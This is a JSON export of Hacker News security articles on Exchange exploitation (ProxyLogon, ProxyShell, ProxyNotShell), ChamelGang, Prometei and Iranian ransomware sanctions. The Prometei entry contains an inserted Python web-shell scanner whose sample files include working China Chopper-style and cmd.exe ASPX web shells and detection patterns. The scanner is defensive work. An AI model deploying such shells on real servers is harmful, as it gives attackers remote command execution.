Using this method [\u2026], the ChamelGang group was able to achieve its goal and steal data from the compromised network.\"\n\nIntrusions mounted by the adversary are believed to have commenced at the end of March 2021, with later attacks in August leveraging what's called the [ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) chain of vulnerabilities affecting Microsoft Exchange Servers, the technical details of which were first revealed at the Black Hat USA 2021 security conference earlier that month.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgpU90FEVyvHUv6m3vUITmIj4tJ_Kexp6cw5No4dV8_Po339DpYJtWa0Z-_BTv7hBE9_EkkSjRVlbP2lsM6MxD-x1p1yD_mQOhRoeiBy9vjPZXWBKrrJlJlvEbl4QdL8woMTd4XIY2ZGusd5N0uFaCwXBUiwFnJnXGfU0C-ESawdO8FR9OB4njoQ6oc>)\n\nThe attack in March is also notable for the fact that the operators breached a subsidiary organization to gain access to an unnamed energy company's network by exploiting a flaw in Red Hat JBoss Enterprise Application ([CVE-2017-12149](<https://access.redhat.com/security/cve/CVE-2017-12149>)) to remotely execute commands on the host and deploy malicious payloads that enable the actor to launch the malware with elevated privileges, laterally pivot across the network, and perform reconnaissance, before deploying a backdoor called DoorMe.\n\n\"The infected hosts were controlled by the attackers using the public utility FRP (fast reverse proxy), written in Golang,\" the researchers said. \"This utility allows connecting to a reverse proxy server. 
The attackers' requests were routed using the socks5 plugin through the server address obtained from the configuration data.\"\n\nOn the other hand, the August attack against a Russian company in the aviation production sector involved the exploitation of ProxyShell flaws (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to drop additional web shells and conduct remote reconnaissance on the compromised node, ultimately leading to the installation of a modified version of the DoorMe implant that comes with expanded capabilities to run arbitrary commands and carry out file operations.\n\n\"Targeting the fuel and energy complex and aviation industry in Russia isn't unique \u2014 this sector is one of the three most frequently attacked,\" Positive Technologies' Head of Threat Analysis, Denis Kuvshinov, said. \"However, the consequences are serious: Most often such attacks lead to financial or data loss\u2014in 84% of all cases last year, the attacks were specifically created to steal data, and that causes major financial and reputational damage.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-04T12:48:00", "type": "thn", "title": "A New APT Hacking Group Targeting Fuel, Energy, and Aviation Industries", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-04T12:48:16", "id": "THN:E95B6A75073DA71CEC73B2E4F0B13622", "href": "https://thehackernews.com/2021/10/a-new-apt-hacking-group-targeting-fuel.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/---oICK3YQu8/YIJ50RG8cxI/AAAAAAAACWY/KkCLoHke1SsfzdcENBXnq3d4jAZlau0ggCLcBGAsYHQ/s0/malware.jpg>)\n\nAttackers are exploiting the ProxyLogon Microsoft Exchange Server flaws to co-opt vulnerable machines to a cryptocurrency botnet named Prometei, according to new 
research.\n\n\"Prometei exploits the recently disclosed Microsoft Exchange vulnerabilities associated with the HAFNIUM attacks to penetrate the network for malware deployment, credential harvesting and more,\" Boston-based cybersecurity firm Cybereason [said](<https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities>) in an analysis summarizing its findings.\n\nFirst documented by Cisco Talos in July 2020, [Prometei](<https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html>) is a multi-modular botnet, with the actor behind the operation employing a wide range of specially-crafted tools and known exploits such as EternalBlue and BlueKeep to harvest credentials, laterally propagate across the network and \"increase the amount of systems participating in its Monero-mining pool.\"\n\n\"Prometei has both Windows-based and Linux-Unix based versions, and it adjusts its payload based on the detected operating system, on the targeted infected machines when spreading across the network,\" Cybereason senior threat researcher Lior Rochberger said, adding it's \"built to interact with four different command-and-control (C2) servers which strengthens the botnet's infrastructure and maintains continuous communications, making it more resistant to takedowns.\"\n\nThe intrusions take advantage of the recently patched vulnerabilities in [Microsoft Exchange Servers](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) with the goal of abusing the processing power of the Windows systems to mine Monero.\n\nIn the attack sequence observed by the firm, the adversary was found exploiting Exchange server flaws CVE-2021-27065 and CVE-2021-26858 as an initial compromise vector to install the China Chopper web shell and gain backdoor ingress to the network. With this access in place, the threat actor launched PowerShell to download the initial Prometei payload from a remote server. 
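The China Chopper web shell Cybereason names, and the ASP.NET shells seen in the other intrusions on this page, share a small set of source-level traits: HTTP request input fed to `eval` or to a process launcher, and placement in directories that hold only static resources. The following is an added example, not code from the article or from Cybereason: a Python scorer that scans .aspx file contents for those indicators. The paths, file contents and weights are constructed for the example; the one-liner mirrors the widely documented China Chopper ASPX form but is not a sample taken from the incident.

```python
"""Score ASP.NET files on an Exchange server for web-shell indicators.
Added example; paths and contents below are constructed, not real samples."""
import re

# Constructed file contents standing in for files found under the Exchange web roots
FILES = {
    r"C:\inetpub\wwwroot\aspnet_client\system_web\xclkmcfldfi.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>',
    r"C:\inetpub\wwwroot\aspnet_client\Ck2qwvJh.aspx":
        '<%@ Page Language="C#" %><%@ Import Namespace="System.Diagnostics" %>\n'
        '<% var p = new Process(); p.StartInfo.FileName = "cmd.exe";\n'
        '   p.StartInfo.Arguments = "/c " + Request["cmd"];\n'
        '   p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true;\n'
        '   p.Start(); Response.Write(p.StandardOutput.ReadToEnd()); %>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFE.aspx":
        '<%@ Page Language="C#" %>\n<html><body>Something went wrong.</body></html>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx":
        '<%@ Page Language="C#" %><% string user = Request.Form["username"]; %>',
}

# (name, pattern, weight): code that turns request input into code or process execution.
# Weights are illustrative; request_input alone is normal for any form page.
INDICATORS = [
    ("eval_of_request", re.compile(r"eval\s*\(\s*Request(?:\.Item)?\s*\[", re.I), 10),
    ("unsafe_eval_flag", re.compile(r',\s*"unsafe"\s*\)', re.I), 5),
    ("process_execution", re.compile(r"System\.Diagnostics|new\s+Process\s*\(|Process\.Start", re.I), 5),
    ("assembly_load", re.compile(r"Assembly\.Load", re.I), 5),
    ("base64_payload", re.compile(r"FromBase64String", re.I), 3),
    ("request_input", re.compile(r"Request(?:\.Item|\.Form|\.QueryString)?\s*\[", re.I), 1),
]


def scan_file(path, content):
    """Return the matched indicator names and a summed score for one file."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(content)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    # aspnet_client holds client-side script only; an .aspx page there is itself a red flag
    if "\\aspnet_client\\" in path.lower() and path.lower().endswith(".aspx"):
        hits.append("aspx_under_aspnet_client")
        score += 3
    return {"path": path, "score": score, "hits": hits}


def find_webshells(files, threshold=8):
    """Score every file and return the ones at or above the threshold, highest first."""
    results = [scan_file(p, c) for p, c in files.items()]
    return sorted((r for r in results if r["score"] >= threshold), key=lambda r: -r["score"])


if __name__ == "__main__":
    for r in find_webshells(FILES):
        print(r["score"], r["path"], ", ".join(r["hits"]))
```

A full sweep would walk the IIS and Exchange FrontEnd directories with `os.walk`, read each `.aspx`/`.ashx`/`.asmx` file and pass it to `scan_file`; comparing results against a known-good install (file hashes from a patched reference server) is what turns a score into a verdict.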
\n\n[](<https://thehackernews.com/images/-QPt-u63tvwA/YIJ6AaW7GPI/AAAAAAAACWg/z8_YGp_eggY-c6gUKoOyrf5D3cZtnDdzwCLcBGAsYHQ/s0/malware.jpg>)\n\nRecent versions of the bot module come with backdoor capabilities that support an extensive set of commands, including an additional module called \"Microsoft Exchange Defender\" that masquerades as a legitimate Microsoft product, which likely takes care of removing other competing web shells that may be installed on the machine so that Prometei gets access to the resources necessary to mine cryptocurrency efficiently.\n\nInterestingly, newly unearthed evidence gathered from [VirusTotal](<https://www.virustotal.com/gui/file/cf542ada135ee3edcbbe7b31003192c75295c7eff0efe7593a0a0b0f792d5256/details>) [artifacts](<https://www.virustotal.com/gui/file/fdcf4887a2ace73b87d1d906b23862c0510f4719a6c159d1cde48075a987a52f/details>) has revealed that the botnet may have been around as early as May 2016, implying that the malware has constantly been evolving ever since, adding new modules and techniques to its capabilities.\n\nPrometei has been observed in a multitude of victims spanning across finance, insurance, retail, manufacturing, utilities, travel, and construction sectors, compromising networks of entities located in the U.S., U.K., and several countries in Europe, South America, and East Asia, while also explicitly avoiding infecting targets in former [Soviet bloc](<https://en.wikipedia.org/wiki/Eastern_Bloc>) countries.\n\nNot much is known about the attackers other than the fact that they are Russian speaking, with older versions of Prometei having their language code set as \"Russian.\" A separate Tor client module used to communicate with a Tor C2 server included a configuration file that's configured to avoid using several exit nodes located in Russia, Ukraine, Belarus, and Kazakhstan.\n\n\"Threat actors in the cybercrime community continue to adopt APT-like techniques and improve efficiency of their operations,\" Rochberger 
said. \"As observed in the recent Prometei attacks, the threat actors rode the wave of the recently discovered Microsoft Exchange vulnerabilities and exploited them in order to penetrate targeted networks.\"\n\n\"This threat poses a great risk for organizations, since the attackers have absolute control over the infected machines, and if they wish so, they can steal information, infect the endpoints with other malware or even collaborate with ransomware gangs by selling the access to the infected endpoints,\" she added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-23T07:42:00", "type": "thn", "title": "Prometei Botnet Exploiting Unpatched Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-23T15:00:17", "id": 
"THN:F2A3695D04A2484E069AC407E754A9C1", "href": "https://thehackernews.com/2021/04/prometei-botnet-exploiting-unpatched.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-04T12:04:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6538WifO-pQPlUhACBuUX_jTbrSpW305DDSQv2XtGhWolinz3L4Hgy3yckiql7NJG9L9tFcb9ZFIPr1a1yBf9bvlyuXOAhhxdrgegxaIMeSIxRzX7JFkUbAULNHo8UzppH76EuY77JOotsyc1FYph-TCqk5DAr4GPj--2TvKuoLT8Tucw6ssJeCOa/s728-e100/proxynotshell.jpg>)\n\nNicknamed ProxyNotShell, a new exploit used in the wild takes advantage of the recently published Microsoft Exchange Server server-side request forgery (SSRF) vulnerability CVE-2022-41040 and a second vulnerability, CVE-2022-41082, that allows remote code execution (RCE) when PowerShell is accessible to the attacker.\n\nThe exploit chains the two bugs in much the same way the 2021 ProxyShell attack chained CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207 to let a remote actor execute arbitrary code.\n\nThe severity of attacks built on such chains is not theoretical: the ProxyShell vulnerabilities are still on CISA's list of the top routinely exploited vulnerabilities of 2021.\n\n## Meet ProxyNotShell \n\nRecorded on September 19, 2022, CVE-2022-41082 affects Microsoft Exchange Server and enables attacks of low complexity that require only low privileges. 
If the server is vulnerable, an authenticated attacker can reach the Exchange PowerShell service and run code through it, which can result in full compromise of the underlying Exchange server.\n\nWith the help of CVE-2022-41040, a second vulnerability also recorded on September 19, 2022, an attacker can trigger CVE-2022-41082 remotely and execute commands on the server.\n\nReaching CVE-2022-41040 requires an authenticated user, which should limit which attackers can use it, but the level of privilege required is low.\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that customers [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure.\n\nBoth vulnerabilities were uncovered by GTSC, a Vietnamese security company, during an active attack that gave the attackers access to some of its clients. Though neither vulnerability on its own is particularly dangerous, exploits chaining them together could lead to catastrophic breaches.\n\nChained, the vulnerabilities could grant an outside attacker the ability to read email directly off an organization's server, breach the organization through the SSRF in CVE-2022-41040, and implant malware on its Exchange Server through the remote code execution in CVE-2022-41082.\n\nThough it appears that attackers would need some level of authentication to use the chained exploit, the exact level required, rated \"Low\" by Microsoft, is not yet clarified. Even so, this authentication requirement should prevent a massive, automated attack against every Exchange server around the globe. 
That would hopefully prevent a replay of the 2021 ProxyShell debacle.\n\nYet finding a single valid email address and password for a given Exchange server should not be overly difficult, and, as this attack bypasses the MFA or FIDO token validation applied to Outlook Web Access logins, one compromised email address/password combination is all that is needed.\n\n## Mitigating ProxyNotShell Exposure\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that customers [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure whose efficacy has not been verified.\n\nBlocking incoming traffic to Exchange Servers that hold critical assets is also an option, though it is only practicable where it does not impact vital operations, and it should be treated as a temporary measure pending a verified patch from Microsoft.\n\n## Assessing ProxyNotShell Exposure\n\nAs the current mitigation options are either of unverified efficacy or potentially damaging to operations, evaluating the degree of exposure to ProxyNotShell can prevent unnecessary and disruptive preventative measures, or indicate which assets to preemptively migrate to unexposed servers.\n\nCymulate Research Lab has developed a [custom-made assessment for ProxyNotShell](<https://cymulate.com/free-trial/>) that enables organizations to estimate their degree of exposure to ProxyNotShell.\n\nA ProxyNotShell attack vector has been added to the advanced scenarios templates, and running it in your environment yields the information needed to validate exposure \u2013 or lack thereof \u2013 to 
ProxyNotShell.\n\nUntil verified patches are available from Microsoft, assessing exposure to ProxyNotShell is the most cost-efficient way to determine exactly which assets are exposed and to devise targeted preemptive measures with maximum impact.\n\n_Note: This article is contributed by [Cymulate Research Labs](<https://cymulate.com/>)._\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T08:05:00", "type": "thn", "title": "ProxyNotShell \u2013 the New Proxy Hell?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-04T10:19:04", "id": "THN:54023E40C0AA4CB15793A39F3AF102AB", "href": "https://thehackernews.com/2022/10/proxynotshell-new-proxy-hell.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:02", "description": "Microsoft plugged as many as [89 security flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>) as part of its monthly Patch Tuesday updates released today, including fixes for an actively exploited zero-day in Internet Explorer that could permit an attacker to run arbitrary code on target machines.\n\nOf these flaws, 14 are listed as Critical and 75 as Important in severity; two of the bugs are described as publicly known, while five others were reported as under active attack at the time of release.\n\nAmong those five security issues is a clutch of vulnerabilities known as [ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) that allow adversaries to break into Microsoft Exchange Servers in target environments and subsequently install unauthorized web-based backdoors to facilitate long-term access.\n\nBut in the wake of Exchange servers coming under [indiscriminate assault](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) toward the end of February by multiple threat groups looking to exploit the vulnerabilities and plant backdoors on corporate networks, Microsoft took the unusual step of releasing out-of-band fixes a week earlier than planned.\n\nThe ramping up of [mass exploitation](<https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/>) after Microsoft released its updates on March 2 has led the company to deploy [another series of security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020>) targeting [older and unsupported](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) cumulative updates that are vulnerable to ProxyLogon attacks.\n\nAlso included in the mix is a patch for a zero-day in Internet Explorer (CVE-2021-26411) that was found to have been exploited by North Korean hackers to [compromise security researchers](<https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html>) working on vulnerability research and development earlier this year.\n\nSouth Korean cybersecurity firm ENKI, which publicly [disclosed](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) the flaw early last month, claimed that North Korean nation-state hackers made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer.\n\nAside from these actively exploited vulnerabilities, the update also corrects a number of remote code execution (RCE) flaws in Windows DNS Server (CVE-2021-26877 and CVE-2021-26897, CVSS scores 9.8), Hyper-V server (CVE-2021-26867, CVSS score 9.9), SharePoint Server (CVE-2021-27076, CVSS score 8.8), and Azure Sphere (CVE-2021-27080, CVSS score 9.3).\n\nCVE-2021-26877 and CVE-2021-26897 are notable for a couple of reasons. 
First off, the flaws are rated as \"exploitation more likely\" by Microsoft, and are categorized as zero-click vulnerabilities of low attack complexity that require no user interaction.\n\nAccording to [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/seven-windows-wonders-critical-vulnerabilities-in-dns-dynamic-updates/>), the vulnerabilities stem from an out-of-bounds read (CVE-2021-26877) and an out-of-bounds write (CVE-2021-26897) on the heap, respectively, during the processing of [Dynamic Update](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/configure-dns-dynamic-updates-windows-server-2003>) packets, resulting in potential arbitrary reads and RCE.\n\nThis is also the second consecutive month in which Microsoft has addressed a critical RCE flaw in Windows DNS Server. Last month, the company rolled out a fix for [CVE-2021-24078](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) in the same component which, if unpatched, could permit an unauthorized party to execute arbitrary code and potentially redirect legitimate traffic to malicious servers.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update and select Check for Windows updates.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T05:37:00", "type": "thn", "title": "Microsoft Issues Security Patches for 89 Flaws \u2014 IE 0-Day Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24078", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26867", "CVE-2021-26877", "CVE-2021-26897", "CVE-2021-27065", "CVE-2021-27076", "CVE-2021-27080"], "modified": "2021-08-13T09:07:37", "id": "THN:BC8A83422D35DB5610358702FCB4D154", "href": "https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-16T04:03:41", "description": 
"The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Wednesday announced sweeping sanctions against ten individuals and two entities backed by Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks dating back to at least October 2020.\n\nThe agency said the cyber activity mounted by the individuals is partially attributable to intrusion sets tracked under the names APT35, Charming Kitten, Nemesis Kitten, Phosphorus, and TunnelVision.\n\n\"This group has launched extensive campaigns against organizations and officials across the globe, particularly targeting U.S. and Middle Eastern defense, diplomatic, and government personnel, as well as private industries including media, energy, business services, and telecommunications,\" the Treasury [said](<https://home.treasury.gov/news/press-releases/jy0948>).\n\nThe Nemesis Kitten actor, which is also known as [Cobalt Mirage](<https://thehackernews.com/2022/05/iranian-hackers-leveraging-bitlocker.html>), [DEV-0270](<https://thehackernews.com/2022/09/microsoft-warns-of-ransomware-attacks.html>), and [UNC2448](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>), has come under the scanner in recent months for its pattern of ransomware attacks for opportunistic revenue generation using Microsoft's built-in BitLocker tool to encrypt files on compromised devices.\n\nMicrosoft and Secureworks have characterized DEV-0270 as a subgroup of [Phosphorus](<https://thehackernews.com/2022/09/iranian-hackers-target-high-value.html>) (aka Cobalt Illusion), with ties to another actor referred to as [TunnelVision](<https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html>). The Windows maker also assessed with low confidence that \"some of DEV-0270's ransomware attacks are a form of moonlighting for personal or company-specific revenue generation.\"\n\nWhat's more, independent analyses from the two cybersecurity firms as well as Google-owned [Mandiant](<https://thehackernews.com/2022/09/iranian-apt42-launched-over-30.html>) have revealed the group's connections to two companies, Najee Technology (which functions under the aliases Secnerd and Lifeweb) and Afkar System, both of which have been subjected to U.S. sanctions.\n\nIt's worth noting that Najee Technology and Afkar System's connections to the Iranian intelligence agency were first flagged by an anonymous anti-Iranian regime entity called [Lab Dookhtegan](<https://thehackernews.com/2021/05/researchers-uncover-iranian-state.html>) [earlier](<https://mobile.twitter.com/LabDookhtegan2/status/1520355269695442945>) this [year](<https://mobile.twitter.com/LabDookhtegan2/status/1539960629867401218>).\n\n\"The model of Iranian government intelligence functions using contractors blurs the lines between the actions tasked by the government and the actions that the private company takes on its own initiative,\" Secureworks said in a [new report](<https://www.secureworks.com/blog/opsec-mistakes-reveal-cobalt-mirage-threat-actors>) detailing the activities of Cobalt Mirage.\n\nWhile exact links between the two companies and the IRGC remain unclear, the practice of private Iranian firms acting as fronts or providing support for intelligence operations has been well established over the years, including in the cases of [ITSecTeam (ITSEC), Mersad](<https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged>), [Emennet Pasargad](<https://thehackernews.com/2021/11/us-charged-2-iranians-hackers-for.html>), and [Rana Intelligence Computing Company](<https://thehackernews.com/2020/09/iranian-hackers-sanctioned.html>).\n\nOn top of that, the Secureworks probe into a 
June 2022 Cobalt Mirage incident showed that a PDF file containing the ransom note was created on December 17, 2021, by an \"Ahmad Khatibi\" and timestamped at UTC+03:30 time zone, which corresponds to the Iran Standard Time. Khatibi, incidentally, happens to be the CEO and owner of the Iranian company Afkar System.\n\nAhmad Khatibi Aghda is also part of the 10 individuals sanctioned by the U.S., alongside Mansour Ahmadi, the CEO of Najee Technology, and other employees of the two enterprises who are said to be complicit in targeting various networks globally by leveraging well-known security flaws to gain initial access to further follow-on attacks.\n\nSome of the [exploited flaws](<https://www.cisa.gov/uscert/ncas/alerts/aa22-257a>), according to a [joint cybersecurity advisory](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/14/iranian-islamic-revolutionary-guard-corps-affiliated-cyber-actors>) released by Australia, Canada, the U.K., and the U.S., as part of the IRGC-affiliated actor activity are as follows -\n\n * Fortinet FortiOS path traversal vulnerability ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>))\n * Fortinet FortiOS default configuration vulnerability ([CVE-2019-5591](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * Fortinet FortiOS SSL VPN 2FA bypass vulnerability ([CVE-2020-12812](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>))\n * [ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), and\n * [Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) (CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105)\n\n\"Khatibi is among the cyber actors who gained unauthorized access to victim networks to encrypt the network with BitLocker and demand a ransom for the decryption keys,\" the U.S. 
government said, in addition to adding him to the FBI's [Most Wanted list](<https://www.fbi.gov/wanted/cyber/ahmad-khatibi-aghda>).\n\n\"He leased network infrastructure used in furtherance of this malicious cyber group's activities, he participated in compromising victims' networks, and he engaged in ransom negotiations with victims.\"\n\nCoinciding with the sanctions, the Justice Department separately [indicted](<https://www.justice.gov/usao-nj/pr/three-iranian-nationals-charged-engaging-computer-intrusions-and-ransomware-style>) Ahmadi, Khatibi, and a third Iranian national named Amir Hossein Nickaein Ravari for engaging in a criminal extortion scheme to inflict damage and losses to victims located in the U.S., Israel, and Iran.\n\nAll three individuals have been charged with one count of conspiring to commit computer fraud and related activity in connection with computers; one count of intentionally damaging a protected computer; and one count of transmitting a demand in relation to damaging a protected computer. Ahmadi has also been charged with one more count of intentionally damaging a protected computer.\n\nThat's not all. The U.S. State Department has also [announced monetary rewards](<https://www.state.gov/sanctioning-iranians-for-malicious-cyber-acts/>) of up to $10 million for any information about [Mansour, Khatibi, and Nikaeen](<https://rewardsforjustice.net/index/?jsf=jet-engine:rewards-grid&tax=cyber:3266>) and their whereabouts.\n\n\"These defendants may have been hacking and extorting victims \u2013 including critical infrastructure providers \u2013 for their personal gain, but the charges reflect how criminals can flourish in the safe haven that the Government of Iran has created and is responsible for,\" Assistant Attorney General Matthew Olsen said.\n\nThe development comes close on the heels of [sanctions](<https://thehackernews.com/2022/09/us-imposes-new-sanctions-on-iran-over.html>) imposed by the U.S. 
